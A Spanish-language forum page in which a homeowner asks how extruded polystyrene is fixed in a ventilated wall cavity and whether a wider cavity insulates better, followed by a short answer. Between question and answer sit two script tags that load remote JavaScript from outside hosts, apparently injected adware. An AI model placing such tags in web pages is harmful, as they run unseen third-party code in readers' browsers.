¿Cómo se fija el poliestireno extruido en la cámara de aire?

Me están haciendo la fachada de mi casa y ayer vi que están fijando el poliestireno extruido a la capa interior de ladrillo con una pasta que parece mortero ¿es correcto? La cámara de aire es ventilada. Otra cuestión que me planteo es si hay la cámara de aire es mejor cuanto más ancha o si por el contrario al ser mayor empeora el aislamiento. Gracias

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

1 Respuesta

Respuesta
1

Es correcto. Una de las maneras de fijar el poliestireno al paramento, la más habitual de hecho, es utilizar morteros adhesivos específicamente destinados a tal fin.

En cuanto a la cámara no es mejor cuanto más ancha. De hecho tiene que tener una medida mínima (creo que unos 3 cm, pero tendría que consultarlo para darte un valor más preciso). Y un mayor grosor no produce una mejora significativa.

------------

Añade tu respuesta

Haz clic para o
El autor de la pregunta ya no la sigue por lo que es posible que no reciba tu respuesta.

Más respuestas relacionadas